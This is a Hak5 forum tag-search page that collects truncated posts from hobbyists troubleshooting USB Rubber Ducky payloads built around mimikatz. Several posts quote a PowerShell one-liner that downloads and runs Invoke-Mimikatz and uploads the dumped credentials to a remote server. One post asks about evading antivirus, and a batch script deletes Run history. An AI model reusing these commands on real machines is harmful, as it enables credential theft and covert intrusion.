Jump to content

Search the Community

Showing results for tags 'mimikatz'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 12 results

  1. Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell S
  2. Hi, I'm trying to avoid antivirus detection of the Invoke-Mimikatz script mentioned here https://www.hak5.org/blog/15-second-password-hack-mr-robot-style I think the only safe way is Base64-encoding the Invoke-Mimikatz script and then decoding it modifying this string in the Powershell script on Rubber Ducky: STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)" I've found some useful links (https://astr0baby.wor
  3. Hope someone can help. I recently got my rubber ducky and I think I understand ducky script enough, but I've run into two big problems. Regarding mimikatz, it seems that when you download the zip file, it needs to be somewhere for the ducky to find and use it. I don't have a webserver like the video suggests, so where as can you place it? Secondly, can you simply have the password creds emailed you to instead of uploading them to the aforementioned web server? Any help is appreciated!! Thanks!
  4. DumpCreds 2.0 Author: QDBA Version: Version 2.0.2 Target: Windows Description Dumps the usernames & plaintext passwords from Browsers (Crome, IE, FireFox) Wifi SAM Hashes Mimimk@tz Dump [new] Computerinformition ( Hardware, Softwarelist, Hotfixes, ProuctKey, Users...) without Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock) Internet connection (becaus Firewall ContentFilter Blocks the download sites) Configuration None needed. Requirements Impacket must be installed.
  5. Be patient with me I am a newbie. I am trying to use rubber ducky and the invoke mimikatz powershell script.\ REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)" I assume download string downloads the file im.ps1 from the http web site (not darrens of coarse) runs it and dumps results in file rx.php and uploads it webserver via http.
  6. So I tried doing everything that is mentioned in Hak5's episode 2101, but when it goes to execute the .ps1 file, there is an error in the cmd prompt which says: Specified cast is not valid. At line:2179 char:7 + if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_D ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : OperationStopped: (:) [], InvalidCastException + FullyQualifiedErrorId : System.InvalidCastException When I look at the .ps1 file through my web server, the error see
  7. Can anyone tell me why the Mimikatz portion of this script is not running? It does create the text files however they are empty. Ima newb as if you didn't know.... Thanks in advance.. @echo off REM Delete registry keys storing Run dialog history REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f REM Creates directory compromised of computer name, date and time REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious set dst=%~d0\slurp\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%ti
  8. I have setup and confirmed the funcitonality of this payload via tcpdump; but the Invoke mimikatz payload's "rx.php" fails to create .creds files. Confirmed appropriate permissions on the php script for www-data. Still nothing is created and no creds are captured. I can see them get sent to the server via packet capture; but if that's not running I don't ever see the creds files the rx.php script is supposed to create.
  9. Afternoon all - I've been manually playing with the evil twin duck mimikatz hack or memory leaker, whatever you wanna call it. Anywho - to test I copied the powershell script I found on another hak5 forum locally and call it like the below powershell "IEX (New-Object Net.WebClient).DownloadString('c:\users\ballsdeep\desktop\test.ps1'); Invoke-Mimikatz -DumpCreds" Well, I get the following error and i know why: ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list When I read thru the powershell script, it's missing the privilege line: "privilege::debug" The below portion of the
  10. I have the Ducky loaded with the invoke-mimikatz script. Inject.Bin runs and saves an output file. Instead of passwords, the file contains the error message listed below: ..... mimikatz(powershell) # sekurlsa::logonpasswords ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list mimikatz(powershell) # exit Bye! I am running the Ducky against an Acer, Win10 laptop. I have Apache and PHP installed locally and I'm using http://localhost for the im.ps1 and rx.php files. I downloaded the IM.ps1 file from GitHub using the link in Darren's Mr. Robot blog. Has any
  11. hi, everyone ! first off i've been watching AAAA'lot of hak5 and rubber ducky episode's aswell as guides, i wanted to generate my own payload or use the mimikatz one, and i found that everytime i tried to encode the txt in my kali distro, with the command : java -jar duckencode.jar -i script.txt -o inject.bin -l dk java -jar ./duckencode.jar -i script.txt -o inject.bin -l dk java -jar encoder.jar -i script.txt -o inject.bin -l dk also the name of the encoder is ''encoder.jar'' not duckencode, so at this point i dont know what to do ... i hope u guys watching and brewing an
  12. Please someone help?? I am a complete n00b to this stuff, but diving in head first, fast~n~hard. I have successfully compiled and used DK's mimkatz\ProcDump payload. My issue lies in the fact that I have to switch the mimkatz.exe between x86 and x64 manually, depending on the OS. Which implies my inspecting said machine first, then pluging in, swaping files, and so on. Or having seperate .bins (SHIFT+payload button or CTRL+payload button, ect.). Is there a way to have one payload using either .exe version from the root dir? If so, could someone please help a n00b out? THaNX iN AdVAnCE *
×
×
  • Create New...